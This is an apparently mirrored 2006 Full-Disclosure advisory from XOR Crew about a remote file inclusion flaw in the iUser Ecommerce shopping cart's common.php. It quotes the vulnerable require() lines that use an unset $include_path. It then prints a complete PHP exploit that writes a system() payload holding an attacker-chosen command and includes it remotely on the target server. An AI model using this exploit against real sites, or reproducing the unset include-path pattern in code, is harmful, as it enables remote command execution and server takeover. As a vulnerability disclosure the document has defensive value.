Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11463
HistoryFeb 16, 2006 - 12:00 a.m.

[Full-disclosure] iUser Ecommerce - Remote Command Execution Vulnerability

2006-02-1600:00:00
vulners.com
8
JSON

=======================================================================================
XOR Crew :: Security Advisory 1/10/2006

iUser Ecommerce - Remote Command Execution Vulnerability

http://www.xorcrew.net/

:: Summary

  Vendor       :  Intensive Point
  Vendor Site  :  http://www.intensivepoint.com/
   Product(s)   :  iUser Ecommerce - shopping cart for digital products

  Version(s)   :  All
  Severity     :  Medium/High
  Impact       :  Remote Command Execution
  Release Date :  1/10/2006
   Credits      :  ReZEN (rezen (a) xorcrew (.) net)

=======================================================================================

I. Description

The iUser digital products shopping cart system has a broad range of features, giving
you an incredible amount of flexibility, while remaining secure, easy to implement and
administer. There is simply no other comparable shopping cart solution specializing in

software downloads distribution available on the market at this price!

=======================================================================================

II. Synopsis

There is a remote file inclusion vulnerability that allows for remote command execution

in the common.php file. The bug is here on lines 28, 29, and 32:

// Load iuser configuration files
@require($include_path . "setup.php");
@require($include_path . "config.php");

// Load misc functions
require($include_path . "util.php");

the $include_path variable is not set prior to being used in the require() function.
The vendor has been contacted and the issue has been resolved.

=======================================================================================

Exploit code:

-----BEGIN-----

<?php

/*
iUser Remote File Inclusion Exploit c0ded by ReZEN

Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url: http://www.xorcrew.net/ReZEN
*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];

$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>"

.&quot;hurl:&lt;br&gt;&lt;input type=&#92;&quot;text&#92;&quot; name=&#92;&quot;hurl&#92;&quot; size=&#92;&quot;90&#92;&quot; value=&#92;&quot;&quot;.$hurl.&quot;&#92;&quot;&gt;&lt;br&gt;&quot;
 .&quot;cmd:&lt;br&gt;&lt;input type=&#92;&quot;text&#92;&quot; name=&#92;&quot;cmd&#92;&quot; size=&#92;&quot;90&#92;&quot; value=&#92;&quot;&quot;.$cmd.&quot;&#92;&quot;&gt;&lt;br&gt;&quot;

.&quot;&lt;input type=&#92;&quot;submit&#92;&quot; value=&#92;&quot;Submit&#92;&quot; name=&#92;&quot;submit&#92;&quot;&gt;&quot;
.&quot;&lt;/form&gt;&lt;HR WIDTH=&#92;&quot;650&#92;&quot; ALIGN=&#92;&quot;LEFT&#92;&quot;&gt;&quot;;

if (!isset($_POST['submit']))

{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"".$cmd."\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");

if (!$file) {
echo "<p>Unable to get output.\n";
exit;
}

echo $form;

while (!feof ($file)) {
$line = fgets ($file, 1024);
echo $line."<br>";

}

}
?>

------END------

=======================================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.

=======================================================================================

JSON